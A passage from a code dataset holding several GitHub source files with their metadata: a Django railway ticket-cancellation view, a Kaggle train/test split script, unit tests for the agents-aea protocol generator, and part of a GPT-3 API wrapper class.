os._exit(0)\n","repo_name":"neillu23/E2ESE","sub_path":"PytorchSE/secode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7623,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"68"} +{"seq_id":"72708846296","text":"from django.shortcuts import render,render_to_response\nfrom django.http import HttpResponseRedirect\nfrom django.template.context_processors import csrf\nfrom BookTicket.models import BookedTicketDetails,PassengerDetails,TrainBooked\nfrom django.core.exceptions import ObjectDoesNotExist\n\n# Create your views here.\n\ndef cancel_view(request):\n\tc={}\n\tc.update(csrf(request))\n\ttry:\n\t\trequest.session['username']\n\texcept KeyError:\n\t\treturn HttpResponseRedirect('/loginModule/loginPage/',c)\n\telse:\n\t\treturn render_to_response('cancelTicket.html',c)\n\ndef cancel_validate(request):\n\tc={}\n\tc.update(csrf(request))\n\ttry:\n\t\trequest.session['username']\n\texcept KeyError:\n\t\treturn HttpResponseRedirect('/loginModule/loginPage/',c)\n\telse:\n\t\tpnr=request.POST.get('pnr_number','')\n\t\tif(len(pnr)!=9):\n\t\t\tmsg=\"PNR Number Should Be Of Length 9...\"\n\t\t\tc.update({'errorMsg':msg})\n\t\t\treturn render_to_response('invalidcancelTicket.html',c)\n\n\t\ttry:\n\t\t\tt=BookedTicketDetails.objects.get(PNRno=pnr)\n\t\texcept ObjectDoesNotExist:\n\t\t\tmsg=\"PLEASE ENTER VALID PNR NUMBER....\"\n\t\t\tc.update({'errorMsg':msg})\n\t\t\treturn render_to_response('invalidcancelTicket.html',c)\n\t\telse:\n\t\t\tif t.username!=request.session['username']:\t\n\t\t\t\tmsg=\"PLEASE ENTER VALID PNR NUMBER....\"\n\t\t\t\tc.update({'errorMsg':msg})\n\t\t\t\treturn render_to_response('invalidcancelTicket.html',c)\n\t\t\telse:\n\t\t\t\tp=PassengerDetails.objects.filter(PNRno=t)\n\t\t\t\ttb=TrainBooked.objects.get(date=t.doj_id)\n\t\t\t\ttseat=0\n\t\t\t\tplist=list(p)\n\t\t\t\tcl=plist[0].coachNo[0:2]\n\t\t\t\trefund=t.totalPrice\n\t\t\t\tfor x in p:\n\t\t\t\t\ttseat=tseat+1\n\t\t\t\tif cl=='CC':\n\t\t\t\t\ttb.availableCC=tb.availableCC+tseat\n\t\t\t\t\tif refund > 120:\n\t\t\t\t\t\trefund=refund-tseat*120\n\t\t\t\t\telse:\n\t\t\t\t\t\trefund=0\n\t\t\t\telse:\n\t\t\t\t\ttb.available2S=tb.available2S+tseat\n\t\t\t\t\tif refund > 60:\n\t\t\t\t\t\trefund=refund-tseat*60\n\t\t\t\t\telse:\n\t\t\t\t\t\trefund=0\n\t\t\t\ttb.save()\n\t\t\t\tt.delete()\n\t\t\t\tc.update({'pnr':pnr})\n\t\t\t\tc.update({'tp':refund})\t\t\t\t\n\n\t\t\t\treturn render_to_response('confirmCancel.html',c)","repo_name":"ChintalJain/OnlineRailwayReservationSystemUsingPython","sub_path":"CancelTicket/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"35308855753","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSplit factors in the 'grid' dataFrame into test/train datasets\n\n First split the data by order_id and then get the associated rows from \n the factors table.\n\n\"\"\"\n\ntestsize = 0.2\n\n# fields to drop\nfdrop = ['label', 'eval_set', 'order_id']\n\n# extract the \"development\" data from the competition \"test\" data\ndev_factors = grid[grid.eval_set != 'test']\nsubmission_factors = grid[grid.eval_set == 'test']\n\n# split 'dev' data by orders \notemp = pd.DataFrame((dev_factors.order_id.unique()), columns=['order_id'])\no_train, o_test = train_test_split(otemp, test_size=testsize, random_state=22)\n\n\n# Get the data rows for the corresponding test/train orders\n\nX_train = pd.merge(o_train, dev_factors)\ny_train = X_train.label\nX_train = X_train.drop(fdrop, axis=1)\n\nX_test = pd.merge(o_test, dev_factors)\ny_test = X_test.label\nX_test = X_test.drop(fdrop, axis=1)\n \n\n# Get the submission factors\n\n#y_sub = submission_factors.label\nX_sub = submission_factors.drop(fdrop, axis=1)\n\n\n\n\n","repo_name":"rosez/KaggleMarketBasketAnalysis","sub_path":"Modeling/30SplitTrainTestSubmissionData.py","file_name":"30SplitTrainTestSubmissionData.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29330067136","text":"import logging\nimport os\nimport shutil\nimport tempfile\nfrom pathlib import Path\nfrom subprocess import CalledProcessError # nosec\nfrom unittest import TestCase, mock\n\nfrom aea.protocols.generator.common import (\n _camel_case_to_snake_case,\n _create_protocol_file,\n _get_sub_types_of_compositional_types,\n _has_matched_brackets,\n _includes_custom_type,\n _match_brackets,\n _python_pt_or_ct_type_to_proto_type,\n _to_camel_case,\n _union_sub_type_to_protobuf_variable_name,\n apply_protolint,\n base_protolint_command,\n check_prerequisites,\n check_protobuf_using_protoc,\n compile_protobuf_using_protoc,\n is_installed,\n load_protocol_specification,\n try_run_black_formatting,\n try_run_isort_formatting,\n try_run_protoc,\n)\n\nfrom tests.test_aea.test_protocols.test_generator.common import (\n PATH_TO_T_PROTOCOL_SPECIFICATION,\n T_PROTOCOL_NAME,\n)\n\n\nlogger = logging.getLogger(\"aea\")\nlogging.basicConfig(level=logging.INFO)\n\n\ndef isort_is_not_installed_side_effect(*args, **kwargs):\n \"\"\"Isort not installed.\"\"\"\n return not args[0] == \"isort\"\n\n\ndef protolint_is_not_installed_side_effect(*args, **kwargs):\n \"\"\"Protolint not installed.\"\"\"\n return not args[0] == \"protolint\"\n\n\ndef black_is_not_installed_side_effect(*args, **kwargs):\n \"\"\"Black not installed.\"\"\"\n return not args[0] == \"black\"\n\n\ndef protoc_is_not_installed_side_effect(*args, **kwargs):\n \"\"\"Protoco not installed.\"\"\"\n return not args[0] == \"protoc\"\n\n\nclass TestCommon(TestCase):\n \"\"\"Test for generator/common.py.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Setup test.\"\"\"\n cls.cwd = os.getcwd()\n cls.t = tempfile.mkdtemp()\n os.chdir(cls.t)\n\n def test_to_camel_case(self):\n \"\"\"Test the '_to_camel_case' method.\"\"\"\n input_text_1 = \"this_is_a_snake_case_text\"\n expected_1 = \"ThisIsASnakeCaseText\"\n output_1 = _to_camel_case(input_text_1)\n assert output_1 == expected_1\n\n input_text_2 = \"This_is_a_Snake_Case_text\"\n expected_2 = \"ThisIsASnakeCaseText\"\n output_2 = _to_camel_case(input_text_2)\n assert output_2 == expected_2\n\n def test_camel_case_to_snake_case(self):\n \"\"\"Test the '_camel_case_to_snake_case' method.\"\"\"\n input_text_1 = \"ThisIsASnakeCaseText\"\n expected_1 = \"this_is_a_snake_case_text\"\n output_1 = _camel_case_to_snake_case(input_text_1)\n assert output_1 == expected_1\n\n def test_match_brackets(\n self,\n ):\n \"\"\"Positive test the '_match_brackets' method.\"\"\"\n text_1 = \"[so[met[hi]]ng]\"\n assert _match_brackets(text_1, 0) == 14\n assert _match_brackets(text_1, 3) == 11\n assert _match_brackets(text_1, 7) == 10\n\n text_2 = \"[]]som[]et[hi[ng][sf]\"\n index_2 = 4\n with self.assertRaises(SyntaxError) as cm:\n _match_brackets(text_2, index_2)\n self.assertEqual(\n str(cm.exception),\n \"Index {} in 'text' is not an open bracket '['. It is {}\".format(\n index_2,\n text_2[index_2],\n ),\n )\n\n index_3 = 2\n with self.assertRaises(SyntaxError) as cm:\n _match_brackets(text_2, index_3)\n self.assertEqual(\n str(cm.exception),\n \"Index {} in 'text' is not an open bracket '['. It is {}\".format(\n index_3,\n text_2[index_3],\n ),\n )\n\n index_4 = 10\n with self.assertRaises(SyntaxError) as cm:\n _match_brackets(text_2, index_4)\n self.assertEqual(\n str(cm.exception),\n \"No matching closing bracket ']' for the opening bracket '[' at {} \"\n + str(index_4),\n )\n\n def test_has_matched_brackets(\n self,\n ):\n \"\"\"Positive test the '_has_matched_brackets' method.\"\"\"\n valid_text_1 = \"[so[met[hi]]ng]\"\n assert _has_matched_brackets(valid_text_1) is True\n\n valid_text_2 = \"[[][[]]]\"\n assert _has_matched_brackets(valid_text_2) is True\n\n valid_text_3 = \"[[[[[[[]]]]]]]\"\n assert _has_matched_brackets(valid_text_3) is True\n\n invalid_text_1 = \"[]]som[]et[hi[ng][sf]\"\n assert _has_matched_brackets(invalid_text_1) is False\n\n invalid_text_2 = \"[]][][[][]\"\n assert _has_matched_brackets(invalid_text_2) is False\n\n invalid_text_3 = \"[]]\"\n assert _has_matched_brackets(invalid_text_3) is False\n\n invalid_text_4 = \"[[]\"\n assert _has_matched_brackets(invalid_text_4) is False\n\n def test_get_sub_types_of_compositional_types_positive(\n self,\n ):\n \"\"\"Positive test the '_get_sub_types_of_compositional_types' method.\"\"\"\n composition_type_1 = \"pt:set[pt:int, integer, bool]\"\n expected_1 = (\"pt:int\", \"integer\", \"bool\")\n assert _get_sub_types_of_compositional_types(composition_type_1) == expected_1\n\n composition_type_2 = \"FrozenSet[something, anotherthing]\"\n expected_2 = (\"something\", \"anotherthing\")\n assert _get_sub_types_of_compositional_types(composition_type_2) == expected_2\n\n composition_type_3 = \"pt:list[pt:str]\"\n expected_3 = (\"pt:str\",)\n assert _get_sub_types_of_compositional_types(composition_type_3) == expected_3\n\n composition_type_4 = \"Tuple[bytes, ...]\"\n expected_4 = (\"bytes\",)\n assert _get_sub_types_of_compositional_types(composition_type_4) == expected_4\n\n composition_type_5 = \"pt:dict[pt:int, pt:int]\"\n expected_5 = (\"pt:int\", \"pt:int\")\n assert _get_sub_types_of_compositional_types(composition_type_5) == expected_5\n\n composition_type_6 = \"Dict[bool, float]\"\n expected_6 = (\"bool\", \"float\")\n assert _get_sub_types_of_compositional_types(composition_type_6) == expected_6\n\n composition_type_7 = \"pt:union[ct:DataModel, pt:bytes, pt:int, pt:bool, pt:float, pt:str, pt:set[pt:int], pt:list[pt:bool], pt:dict[pt:str,pt:str]]\"\n expected_7 = (\n \"ct:DataModel\",\n \"pt:bytes\",\n \"pt:int\",\n \"pt:bool\",\n \"pt:float\",\n \"pt:str\",\n \"pt:set[pt:int]\",\n \"pt:list[pt:bool]\",\n \"pt:dict[pt:str,pt:str]\",\n )\n assert _get_sub_types_of_compositional_types(composition_type_7) == expected_7\n\n composition_type_8 = \"Union[int, Tuple[bool, ...]]\"\n expected_8 = (\"int\", \"Tuple[bool, ...]\")\n assert _get_sub_types_of_compositional_types(composition_type_8) == expected_8\n\n composition_type_9 = (\n \"Union[DataModel, FrozenSet[int], Tuple[bool, ...], bytes, Dict[bool,float], int, \"\n \"FrozenSet[bool], Dict[int, str], Tuple[str, ...], bool, float, str, Dict[str, str]]\"\n )\n expected_9 = (\n \"DataModel\",\n \"FrozenSet[int]\",\n \"Tuple[bool, ...]\",\n \"bytes\",\n \"Dict[bool,float]\",\n \"int\",\n \"FrozenSet[bool]\",\n \"Dict[int, str]\",\n \"Tuple[str, ...]\",\n \"bool\",\n \"float\",\n \"str\",\n \"Dict[str, str]\",\n )\n assert _get_sub_types_of_compositional_types(composition_type_9) == expected_9\n\n composition_type_10 = \"pt:optional[pt:union[ct:DataModel, pt:bytes, pt:int, pt:bool, pt:float, pt:str, pt:set[pt:int], pt:list[pt:bool], pt:dict[pt:str,pt:str]]]\"\n expected_10 = (\n \"pt:union[ct:DataModel, pt:bytes, pt:int, pt:bool, pt:float, pt:str, pt:set[pt:int], pt:list[pt:bool], pt:dict[pt:str,pt:str]]\",\n )\n assert _get_sub_types_of_compositional_types(composition_type_10) == expected_10\n\n composition_type_11 = \"Optional[Union[DataModel, bytes, int, bool, float, str, FrozenSet[int], Tuple[bool, ...], Dict[str,str]]]\"\n expected_11 = (\n \"Union[DataModel, bytes, int, bool, float, str, FrozenSet[int], Tuple[bool, ...], Dict[str,str]]\",\n )\n assert _get_sub_types_of_compositional_types(composition_type_11) == expected_11\n\n def test_get_sub_types_of_compositional_types_negative(\n self,\n ):\n \"\"\"Negative test the '_get_sub_types_of_compositional_types' method\"\"\"\n composition_type_1 = \"pt:int\"\n with self.assertRaises(SyntaxError) as cm:\n _get_sub_types_of_compositional_types(composition_type_1)\n self.assertEqual(\n str(cm.exception),\n \"{} is not a valid compositional type.\".format(composition_type_1),\n )\n\n composition_type_2 = \"pt:int[pt:DataModel]\"\n with self.assertRaises(SyntaxError) as cm:\n _get_sub_types_of_compositional_types(composition_type_2)\n self.assertEqual(\n str(cm.exception),\n \"{} is not a valid compositional type.\".format(composition_type_2),\n )\n\n composition_type_3 = \"pt:dict[pt:set[int, pt:list[pt:bool]]\"\n with self.assertRaises(SyntaxError) as cm:\n _get_sub_types_of_compositional_types(composition_type_3)\n self.assertEqual(\n str(cm.exception),\n \"Bad formatting. No matching close bracket ']' for the open bracket at pt:set[\",\n )\n\n def test_union_sub_type_to_protobuf_variable_name(\n self,\n ):\n \"\"\"Test the '_union_sub_type_to_protobuf_variable_name' method\"\"\"\n content_name = \"proposal\"\n\n content_type_1 = \"FrozenSet[int]\"\n assert (\n _union_sub_type_to_protobuf_variable_name(content_name, content_type_1)\n == \"proposal_type_set_of_int\"\n )\n\n content_type_2 = \"Tuple[str, ...]\"\n assert (\n _union_sub_type_to_protobuf_variable_name(content_name, content_type_2)\n == \"proposal_type_list_of_str\"\n )\n\n content_type_3 = \"Dict[bool, float]\"\n assert (\n _union_sub_type_to_protobuf_variable_name(content_name, content_type_3)\n == \"proposal_type_dict_of_bool_float\"\n )\n\n content_type_4 = \"int\"\n assert (\n _union_sub_type_to_protobuf_variable_name(content_name, content_type_4)\n == \"proposal_type_int\"\n )\n\n content_type_5 = \"DataModel\"\n assert (\n _union_sub_type_to_protobuf_variable_name(content_name, content_type_5)\n == \"proposal_type_DataModel\"\n )\n\n def test_python_pt_or_ct_type_to_proto_type(\n self,\n ):\n \"\"\"Test the '_python_pt_or_ct_type_to_proto_type' method\"\"\"\n content_type_bytes = \"bytes\"\n assert _python_pt_or_ct_type_to_proto_type(content_type_bytes) == \"bytes\"\n\n content_type_int = \"int\"\n assert _python_pt_or_ct_type_to_proto_type(content_type_int) == \"int64\"\n\n content_type_float = \"float\"\n assert _python_pt_or_ct_type_to_proto_type(content_type_float) == \"float\"\n\n content_type_bool = \"bool\"\n assert _python_pt_or_ct_type_to_proto_type(content_type_bool) == \"bool\"\n\n content_type_str = \"str\"\n assert _python_pt_or_ct_type_to_proto_type(content_type_str) == \"string\"\n\n content_type_ct = \"Query\"\n assert _python_pt_or_ct_type_to_proto_type(content_type_ct) == \"Query\"\n\n def test_includes_custom_type(\n self,\n ):\n \"\"\"Test the '_includes_custom_type' method\"\"\"\n content_type_includes_1 = \"Optional[DataModel]\"\n assert _includes_custom_type(content_type_includes_1) is True\n\n content_type_includes_2 = \"Union[int, DataModel]\"\n assert _includes_custom_type(content_type_includes_2) is True\n\n content_type_includes_3 = \"Optional[Union[int, float, DataModel, Query, float]]\"\n assert _includes_custom_type(content_type_includes_3) is True\n\n content_type_not_includes_1 = \"Optional[int]\"\n assert _includes_custom_type(content_type_not_includes_1) is False\n\n content_type_not_includes_2 = \"Union[int, float, str]\"\n assert _includes_custom_type(content_type_not_includes_2) is False\n\n content_type_not_includes_3 = (\n \"Optional[Union[int, float, FrozenSet[int], Tuple[bool, ...], float]]\"\n )\n assert _includes_custom_type(content_type_not_includes_3) is False\n\n @mock.patch(\"shutil.which\", return_value=\"some string\")\n def test_is_installed_positive(self, mocked_shutil_which):\n \"\"\"Positive test for the 'is_installed' method\"\"\"\n assert is_installed(\"some_programme\") is True\n\n @mock.patch(\"shutil.which\", return_value=None)\n def test_is_installed_negative(self, mocked_shutil_which):\n \"\"\"Negative test for the 'is_installed' method: programme is not installed\"\"\"\n assert is_installed(\"some_programme\") is False\n\n def test_base_protolint_command(self):\n \"\"\"Tests the 'base_protolint_command' method\"\"\"\n assert (\n base_protolint_command() == \"protolint\"\n or \"PATH=${PATH}:${GOPATH}/bin/:~/go/bin protolint\"\n )\n\n @mock.patch(\"aea.protocols.generator.common.is_installed\", return_value=True)\n def test_check_prerequisites_positive(self, mocked_is_installed):\n \"\"\"Positive test for the 'check_prerequisites' method\"\"\"\n try:\n check_prerequisites()\n except FileNotFoundError:\n self.assertTrue(False)\n\n @mock.patch(\n \"aea.protocols.generator.common.is_installed\",\n side_effect=black_is_not_installed_side_effect,\n )\n def test_check_prerequisites_negative_black_is_not_installed(\n self, mocked_is_installed\n ):\n \"\"\"Negative test for the 'check_prerequisites' method: black isn't installed\"\"\"\n with self.assertRaises(FileNotFoundError):\n check_prerequisites()\n\n @mock.patch(\n \"aea.protocols.generator.common.is_installed\",\n side_effect=isort_is_not_installed_side_effect,\n )\n def test_check_prerequisites_negative_isort_is_not_installed(\n self, mocked_is_installed\n ):\n \"\"\"Negative test for the 'check_prerequisites' method: isort isn't installed\"\"\"\n with self.assertRaises(FileNotFoundError):\n check_prerequisites()\n\n @mock.patch(\n \"aea.protocols.generator.common.subprocess.call\",\n return_value=1,\n )\n def test_check_prerequisites_negative_protolint_is_not_installed(\n self, mocked_is_installed\n ):\n \"\"\"Negative test for the 'check_prerequisites' method: protolint isn't installed\"\"\"\n with self.assertRaises(FileNotFoundError):\n check_prerequisites()\n\n @mock.patch(\n \"aea.protocols.generator.common.is_installed\",\n side_effect=protoc_is_not_installed_side_effect,\n )\n def test_check_prerequisites_negative_protoc_is_not_installed(\n self, mocked_is_installed\n ):\n \"\"\"Negative test for the 'check_prerequisites' method: protoc isn't installed\"\"\"\n with self.assertRaises(FileNotFoundError):\n check_prerequisites()\n\n def test_load_protocol_specification(\n self,\n ):\n \"\"\"Test the 'load_protocol_specification' method\"\"\"\n spec = load_protocol_specification(PATH_TO_T_PROTOCOL_SPECIFICATION)\n assert spec.name == T_PROTOCOL_NAME\n assert spec.version == \"0.1.0\"\n assert spec.author == \"fetchai\"\n assert spec.license == \"Apache-2.0\"\n assert spec.aea_version == \">=1.0.0, <2.0.0\"\n assert spec.description == \"A protocol for testing purposes.\"\n assert spec.speech_acts is not None\n assert spec.protobuf_snippets is not None and spec.protobuf_snippets != \"\"\n\n def test_create_protocol_file(\n self,\n ):\n \"\"\"Test the '_create_protocol_file' method\"\"\"\n file_name = \"temp_file\"\n file_content = \"this is a temporary file\"\n\n _create_protocol_file(self.t, file_name, file_content)\n path_to_the_file = os.path.join(self.t, file_name)\n\n assert Path(path_to_the_file).exists()\n assert Path(path_to_the_file).read_text() == file_content\n\n @mock.patch(\"subprocess.run\")\n def test_try_run_black_formatting(self, mocked_subprocess):\n \"\"\"Test the 'try_run_black_formatting' method\"\"\"\n try_run_black_formatting(\"some_path\")\n mocked_subprocess.assert_called_once()\n\n @mock.patch(\"subprocess.run\")\n def test_try_run_isort_formatting(self, mocked_subprocess):\n \"\"\"Test the 'try_run_isort_formatting' method\"\"\"\n try_run_isort_formatting(\"some_path\")\n mocked_subprocess.assert_called_once()\n\n @mock.patch(\"subprocess.run\")\n def test_try_run_protoc(self, mocked_subprocess):\n \"\"\"Test the 'try_run_protoc' method\"\"\"\n try_run_protoc(\"some_path\", \"some_name\")\n mocked_subprocess.assert_called_once()\n\n @mock.patch(\"subprocess.run\")\n def test_try_run_protolint(self, mocked_subprocess):\n \"\"\"Test the 'try_run_protolint' method\"\"\"\n try_run_protoc(\"some_path\", \"some_name\")\n mocked_subprocess.assert_called_once()\n\n @mock.patch(\"aea.protocols.generator.common.try_run_protoc\")\n def test_check_protobuf_using_protoc_positive(self, mocked_try_run_protoc):\n \"\"\"Positive test for the 'check_protobuf_using_protoc' method\"\"\"\n protocol_name = \"protocol_name\"\n file_name = protocol_name + \"_pb2.py\"\n\n new_file = open(os.path.join(self.t, file_name), \"w+\")\n new_file.close()\n result, msg = check_protobuf_using_protoc(self.t, protocol_name)\n\n assert not Path(self.t, file_name).exists()\n assert result is True\n assert msg == \"protobuf file is valid\"\n\n @mock.patch(\n \"subprocess.run\",\n side_effect=CalledProcessError(\n 1, \"some_command\", stderr=\"name.proto:12:45: some_protoc_error\\n\"\n ),\n )\n def test_check_protobuf_using_protoc_nagative(self, mocked_subprocess):\n \"\"\"Negative test for the 'check_protobuf_using_protoc' method: protoc has some errors\"\"\"\n result, msg = check_protobuf_using_protoc(\"some_path\", \"name\")\n assert result is False\n assert msg == \"some_protoc_error\"\n\n @mock.patch(\"aea.protocols.generator.common.try_run_protoc\")\n def test_compile_protobuf_using_protoc_positive(self, mocked_try_run_protoc):\n \"\"\"Positive test for the 'compile_protobuf_using_protoc' method\"\"\"\n protocol_name = \"protocol_name\"\n\n result, msg = compile_protobuf_using_protoc(self.t, protocol_name, \"python\")\n\n mocked_try_run_protoc.assert_called_once()\n assert result is True\n assert msg == \"protobuf schema successfully compiled\"\n\n @mock.patch(\n \"subprocess.run\",\n side_effect=CalledProcessError(\n 1, \"some_command\", stderr=\"protocol_name.proto:12:45: some_protoc_error\\n\"\n ),\n )\n def test_compile_protobuf_using_protoc_nagative(self, mocked_subprocess):\n \"\"\"Negative test for the 'check_protobuf_using_protoc' method: protoc has some errors\"\"\"\n protocol_name = \"protocol_name\"\n result, msg = compile_protobuf_using_protoc(self.t, protocol_name, \"python\")\n assert result is False\n assert msg == \"some_protoc_error\"\n\n @mock.patch(\"aea.protocols.generator.common.try_run_protolint\")\n def test_apply_protolint_positive(self, mocked_try_run_protoc):\n \"\"\"Positive test for the 'apply_protolint' method\"\"\"\n protocol_name = \"protocol_name\"\n\n result, msg = apply_protolint(self.t, protocol_name)\n\n mocked_try_run_protoc.assert_called_once()\n assert result is True\n assert msg == \"protolint has no output\"\n\n @mock.patch(\n \"subprocess.run\",\n side_effect=CalledProcessError(\n 1,\n \"some_command\",\n stderr=\"protocol_name.proto:12:45: some_protoc_error\\nprotocol_name.proto:12:45: incorrect indentation style ...\",\n ),\n )\n def test_apply_protolint_nagative(self, mocked_subprocess):\n \"\"\"Negative test for the 'apply_protolint' method: protoc has some errors\"\"\"\n protocol_name = \"protocol_name\"\n result, msg = apply_protolint(self.t, protocol_name)\n assert result is False\n assert msg == \"protocol_name.proto:12:45: some_protoc_error\"\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Tear the test down.\"\"\"\n os.chdir(cls.cwd)\n try:\n shutil.rmtree(cls.t)\n except (OSError, IOError):\n pass\n","repo_name":"fetchai/agents-aea","sub_path":"tests/test_aea/test_protocols/test_generator/test_common.py","file_name":"test_common.py","file_ext":"py","file_size_in_byte":20321,"program_lang":"python","lang":"en","doc_type":"code","stars":182,"dataset":"github-code","pt":"68"} +{"seq_id":"5044456556","text":"\"\"\"Contains classes for querying large language models.\"\"\"\nfrom math import ceil\nimport os\nimport time\nfrom tqdm import tqdm\nfrom abc import ABC, abstractmethod\n\nimport openai\n\ngpt_costs_per_thousand = {\n 'davinci': 0.0200,\n 'curie': 0.0020,\n 'babbage': 0.0005,\n 'ada': 0.0004\n}\n\n\ndef model_from_config(config, disable_tqdm=True):\n \"\"\"Returns a model based on the config.\"\"\"\n model_type = config[\"name\"]\n if model_type == \"GPT_forward\":\n return GPT_Forward(config, disable_tqdm=disable_tqdm)\n elif model_type == \"GPT_insert\":\n return GPT_Insert(config, disable_tqdm=disable_tqdm)\n raise ValueError(f\"Unknown model type: {model_type}\")\n\n\nclass LLM(ABC):\n \"\"\"Abstract base class for large language models.\"\"\"\n\n @abstractmethod\n def generate_text(self, prompt):\n \"\"\"Generates text from the model.\n Parameters:\n prompt: The prompt to use. This can be a string or a list of strings.\n Returns:\n A list of strings.\n \"\"\"\n pass\n\n @abstractmethod\n def log_probs(self, text, log_prob_range):\n \"\"\"Returns the log probs of the text.\n Parameters:\n text: The text to get the log probs of. This can be a string or a list of strings.\n log_prob_range: The range of characters within each string to get the log_probs of. \n This is a list of tuples of the form (start, end).\n Returns:\n A list of log probs.\n \"\"\"\n pass\n\n\nclass GPT_Forward(LLM):\n \"\"\"Wrapper for GPT-3.\"\"\"\n\n def __init__(self, config, needs_confirmation=False, disable_tqdm=True):\n \"\"\"Initializes the model.\"\"\"\n self.config = config\n self.needs_confirmation = needs_confirmation\n self.disable_tqdm = disable_tqdm\n\n def confirm_cost(self, texts, n, max_tokens):\n total_estimated_cost = 0\n for text in texts:\n total_estimated_cost += gpt_get_estimated_cost(\n self.config, text, max_tokens) * n\n print(f\"Estimated cost: ${total_estimated_cost:.2f}\")\n # Ask the user to confirm in the command line\n if os.getenv(\"LLM_SKIP_CONFIRM\") is None:\n confirm = input(\"Continue? (y/n) \")\n if confirm != 'y':\n raise Exception(\"Aborted.\")\n\n def auto_reduce_n(self, fn, prompt, n):\n \"\"\"Reduces n by half until the function succeeds.\"\"\"\n try:\n return fn(prompt, n)\n except BatchSizeException as e:\n if n == 1:\n raise e\n return self.auto_reduce_n(fn, prompt, n // 2) + self.auto_reduce_n(fn, prompt, n // 2)\n\n def generate_text(self, prompt, n):\n if not isinstance(prompt, list):\n prompt = [prompt]\n if self.needs_confirmation:\n self.confirm_cost(\n prompt, n, self.config['gpt_config']['max_tokens'])\n batch_size = self.config['batch_size']\n prompt_batches = [prompt[i:i + batch_size]\n for i in range(0, len(prompt), batch_size)]\n if not self.disable_tqdm:\n print(\n f\"[{self.config['name']}] Generating {len(prompt) * n} completions, \"\n f\"split into {len(prompt_batches)} batches of size {batch_size * n}\")\n text = []\n\n for prompt_batch in tqdm(prompt_batches, disable=self.disable_tqdm):\n text += self.auto_reduce_n(self.__generate_text, prompt_batch, n)\n return text\n\n def complete(self, prompt, n):\n \"\"\"Generates text from the model and returns the log prob data.\"\"\"\n if not isinstance(prompt, list):\n prompt = [prompt]\n batch_size = self.config['batch_size']\n prompt_batches = [prompt[i:i + batch_size]\n for i in range(0, len(prompt), batch_size)]\n if not self.disable_tqdm:\n print(\n f\"[{self.config['name']}] Generating {len(prompt) * n} completions, \"\n f\"split into {len(prompt_batches)} batches of size {batch_size * n}\")\n res = []\n for prompt_batch in tqdm(prompt_batches, disable=self.disable_tqdm):\n res += self.__complete(prompt_batch, n)\n return res\n\n def log_probs(self, text, log_prob_range=None):\n \"\"\"Returns the log probs of the text.\"\"\"\n if not isinstance(text, list):\n text = [text]\n if self.needs_confirmation:\n self.confirm_cost(text, 1, 0)\n batch_size = self.config['batch_size']\n text_batches = [text[i:i + batch_size]\n for i in range(0, len(text), batch_size)]\n if log_prob_range is None:\n log_prob_range_batches = [None] * len(text)\n else:\n assert len(log_prob_range) == len(text)\n log_prob_range_batches = [log_prob_range[i:i + batch_size]\n for i in range(0, len(log_prob_range), batch_size)]\n if not self.disable_tqdm:\n print(\n f\"[{self.config['name']}] Getting log probs for {len(text)} strings, \"\n f\"split into {len(text_batches)} batches of (maximum) size {batch_size}\")\n log_probs = []\n tokens = []\n for text_batch, log_prob_range in tqdm(list(zip(text_batches, log_prob_range_batches)),\n disable=self.disable_tqdm):\n log_probs_batch, tokens_batch = self.__log_probs(\n text_batch, log_prob_range)\n log_probs += log_probs_batch\n tokens += tokens_batch\n return log_probs, tokens\n\n def __generate_text(self, prompt, n):\n \"\"\"Generates text from the model.\"\"\"\n if not isinstance(prompt, list):\n text = [prompt]\n config = self.config['gpt_config'].copy()\n config['n'] = n\n # If there are any [APE] tokens in the prompts, remove them\n for i in range(len(prompt)):\n prompt[i] = prompt[i].replace('[APE]', '').strip()\n response = None\n while response is None:\n try:\n response = openai.Completion.create(\n **config, prompt=prompt)\n except Exception as e:\n if 'is greater than the maximum' in str(e):\n raise BatchSizeException()\n print(e)\n print('Retrying...')\n time.sleep(5)\n\n return [response['choices'][i]['text'] for i in range(len(response['choices']))]\n\n def __complete(self, prompt, n):\n \"\"\"Generates text from the model and returns the log prob data.\"\"\"\n if not isinstance(prompt, list):\n text = [prompt]\n config = self.config['gpt_config'].copy()\n config['n'] = n\n # If there are any [APE] tokens in the prompts, remove them\n for i in range(len(prompt)):\n prompt[i] = prompt[i].replace('[APE]', '').strip()\n response = None\n while response is None:\n try:\n response = openai.Completion.create(\n **config, prompt=prompt)\n except Exception as e:\n print(e)\n print('Retrying...')\n time.sleep(5)\n return response['choices']\n\n def __log_probs(self, text, log_prob_range=None):\n \"\"\"Returns the log probs of the text.\"\"\"\n if not isinstance(text, list):\n text = [text]\n if log_prob_range is not None:\n for i in range(len(text)):\n lower_index, upper_index = log_prob_range[i]\n assert lower_index < upper_index\n assert lower_index >= 0\n assert upper_index - 1 < len(text[i])\n config = self.config['gpt_config'].copy()\n config['logprobs'] = 1\n config['echo'] = True\n config['max_tokens'] = 0\n if isinstance(text, list):\n text = [f'\\n{text[i]}' for i in range(len(text))]\n else:\n text = f'\\n{text}'\n response = None\n while response is None:\n try:\n response = openai.Completion.create(\n **config, prompt=text)\n except Exception as e:\n print(e)\n print('Retrying...')\n time.sleep(5)\n log_probs = [response['choices'][i]['logprobs']['token_logprobs'][1:]\n for i in range(len(response['choices']))]\n tokens = [response['choices'][i]['logprobs']['tokens'][1:]\n for i in range(len(response['choices']))]\n offsets = [response['choices'][i]['logprobs']['text_offset'][1:]\n for i in range(len(response['choices']))]\n\n # Subtract 1 from the offsets to account for the newline\n for i in range(len(offsets)):\n offsets[i] = [offset - 1 for offset in offsets[i]]\n\n if log_prob_range is not None:\n # First, we need to find the indices of the tokens in the log probs\n # that correspond to the tokens in the log_prob_range\n for i in range(len(log_probs)):\n lower_index, upper_index = self.get_token_indices(\n offsets[i], log_prob_range[i])\n log_probs[i] = log_probs[i][lower_index:upper_index]\n tokens[i] = tokens[i][lower_index:upper_index]\n\n return log_probs, tokens\n\n def get_token_indices(self, offsets, log_prob_range):\n \"\"\"Returns the indices of the tokens in the log probs that correspond to the tokens in the log_prob_range.\"\"\"\n # For the lower index, find the 